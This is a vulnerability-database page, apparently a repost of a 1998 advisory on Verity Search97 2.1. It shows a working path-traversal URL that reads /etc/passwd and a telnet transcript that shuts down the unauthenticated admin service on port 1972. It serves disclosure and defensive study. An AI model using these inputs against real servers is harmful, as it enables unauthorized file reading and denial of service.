Verity Search97 2.1 – Security

Verity Search97 2.1 – Security

漏洞ID 1053374 漏洞类型
发布时间 1998-07-14 更新时间 1998-07-14
图片[1]-Verity Search97 2.1 – Security-安全小百科CVE编号 N/A
图片[2]-Verity Search97 2.1 – Security-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19127
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/162/info

A pair of vulnerabilities exist in Verity's Search`97 web interface to the Verity search engine. The first vulnerability is due to cgi-bin scripts, s97_cgi and s97r_cgi failing to check for the existence of certain shell meta characters. This allows an attacker to access any file on the file system.

The second vulnerability is due to a lack of authentication being used to access the Verity administrative program. Any user can telnet to the appropriate port, and issue a command to shut the Verity software down.

s97_cgi:
http://www.xxx.com/search97.vts
?HLNavigate=On&querytext=dcm
&ServerKey=Primary
&ResultTemplate=../../../../../../../etc/passwd
&ResultStyle=simple
&ResultCount=20
&collection=books

tasmgr:
telnet to port 1972

0 Verity dcm ready
list
0 TAS-Primary
status tas-primary
0 TYPE=PROCESS; STATE=RUNNING; STARTUP=AUTO_START; PID=87632
stop tas-primary
0 'tas-primary' signalled
status tas-primary
0 TYPE=PROCESS; STATE=STOPPING; STARTUP=AUTO_START; PID=87632
where
0 /home/verity/_hpux10/bin/dcm.cfg

相关推荐: syslog服务拒绝漏洞

syslog服务拒绝漏洞 漏洞ID 1207599 漏洞类型 未知 发布时间 1997-01-01 更新时间 1997-01-01 CVE编号 CVE-1999-0171 CNNVD-ID CNNVD-199701-016 漏洞平台 N/A CVSS评分 2.…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享